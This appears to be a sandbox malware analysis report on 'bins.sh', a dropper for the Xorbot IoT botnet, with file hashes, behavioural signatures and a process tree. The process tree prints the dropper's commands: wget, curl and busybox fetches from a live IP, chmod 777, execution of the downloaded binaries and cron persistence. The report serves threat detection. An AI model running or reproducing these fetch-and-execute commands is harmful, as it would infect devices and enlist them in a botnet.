Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    160s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27/02/2025, 16:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    e4ab9be0cf5c27c72b420fc606e0700a

  • SHA1

    d3549211a3fdbd5e1fb153d2f7c711000b0339db

  • SHA256

    0bfa0c9ecd60657c9dee4a927bf6fb575c6593ec3756e9425642452749a3a40c

  • SHA512

    3e2b6dd99e8a0e4abc2a4a35a786de1d02d2b0fda5baa7390d53c70e31c978e62189d010741cc32d5bc5d613083cec1374501335a179f6fe533ff7170be7536b

  • SSDEEP

    96:fHncM5hGDpc21Y8abkXx2tKbkE2h2tdRPWAxHnc6phGvpthLVY8xd:V5aG2+rQxG/CC

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Contacts a large (1966) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 7 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:654
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:656
      • /usr/bin/wget
        wget http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • Writes file to tmp directory
        PID:658
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:677
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • Writes file to tmp directory
        PID:687
      • /bin/chmod
        chmod 777 PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • File and Directory Permissions Modification
        PID:688
      • /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        ./PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
          PID:689
        • /bin/rm
          rm PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
          2⤵
            PID:691
          • /usr/bin/wget
            wget http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Writes file to tmp directory
            PID:692
          • /usr/bin/curl
            curl -O http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:738
          • /bin/busybox
            /bin/busybox wget http://37.44.238.88/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Writes file to tmp directory
            PID:769
          • /bin/chmod
            chmod 777 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • File and Directory Permissions Modification
            PID:770
          • /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            ./PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Renames itself
            • Reads runtime system information
            PID:771
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:773
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:774
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:775
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:776
                • /bin/rm
                  rm PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
                  2⤵
                    PID:778
                  • /usr/bin/wget
                    wget http://37.44.238.88/bins/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G
                    2⤵
                    • Writes file to tmp directory
                    PID:781

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
                  Filesize

                  177KB

                  MD5

                  786d75a158fe731feca3880f436082c0

                  SHA1

                  79ea2734e43d00cdeabed5586b2c1994d02aef3e

                  SHA256

                  5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                  SHA512

                  7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                  Download Submit

                • /tmp/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G
                  Filesize

                  12KB

                  MD5

                  52ada75fd996718b8b9bc34da16eef24

                  SHA1

                  d12ad65f90bf69998210811cbb938a7265da1481

                  SHA256

                  0d8fb1bdefaaecec5c364cd7de9fee4b858437104269904655f5525b3396a6ff

                  SHA512

                  6090176f681c151bb983e1dc4f5aa754e0dcf4d0d082e97a981055acec881c6a6da09062db0fe7bc95346b1b1ccd09813fadf51b06e0744e7c062f6c5f8f1361

                  Download Submit

                • /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
                  Filesize

                  98KB

                  MD5

                  5141342d0df8699fa32a6b066a0c592e

                  SHA1

                  8157673225bd5182f16215e2aa823a25ca2d4fbc

                  SHA256

                  54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                  SHA512

                  d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                  Download Submit

                • /var/spool/cron/crontabs/tmp.BlAyKX
                  Filesize

                  210B

                  MD5

                  70337ad935aa43cd14d49d17d2e97c95

                  SHA1

                  4bd37b55154c602f76a193ca431a5b822616930d

                  SHA256

                  9bb073a53d9f11e97cb19bf2fc65f6a47cbbf9d054624c9cf10b0958f08427fc

                  SHA512

                  0c67c323a19ee3eb33c39bc085f02b3cad48ffc3d8466508f62c66dbddff882cb1a4f13b4f27226f5066756dcd5b8b696bcfec86a5ce71fbb176dbcf678b3b7e

                  Download Submit